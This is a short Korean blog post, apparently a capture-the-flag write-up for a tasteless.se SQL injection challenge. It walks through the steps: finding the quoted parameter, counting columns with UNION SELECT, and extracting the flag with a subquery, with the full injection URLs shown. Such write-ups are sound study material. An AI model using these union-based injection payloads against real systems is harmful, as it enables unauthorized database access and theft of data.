Capture the flag! hint: table level2_flag column flag
No Bsqli!!
라는 힌트와 함께 그림이 있다. 주소창이
http://chall.tasteless.se/level2/index.php?req=f 이므로 mysql이라 가정하고 f%23등으로 뒤를 주석
으로 막았더니 그림이 나오질 않는다. 그림이 안나오면 에러처리되는것 같고,
f'%23으로 해보면 되는것으로 보아 쿼터로 둘러쌓여있음을 알 수 있다.
힌트에 Bsqli하지말라고 했으므로 그냥 값이 딱 나오는 sqli일 것이다.
union으로 값을 넣어봤더니. http://chall.tasteless.se/level2/index.php?req=f%27%20union%20select%201,2,3%23
처럼 3까지 넣었을때 맨 아래 살짝 3이 출력된다. 그러면 서브쿼리를 이용해서
http://chall.tasteless.se/level2/index.php?req=f%27%20union%20select%201,2,(select%20flag%20from%20level2_flag)%23
이렇게 값을 넣었더니 flag가 출력된다.
'webhacking > sql, sql injection' 카테고리의 다른 글
| webhacking.kr 27, 29 (0) | 2014.11.30 |
|---|---|
| chall.tasteless.se Stop Quotes (0) | 2014.11.21 |
| suninatas level 23 (0) | 2014.10.30 |
| suninatas level 6 (0) | 2014.10.30 |
| webhacking.kr 22 (0) | 2014.10.23 |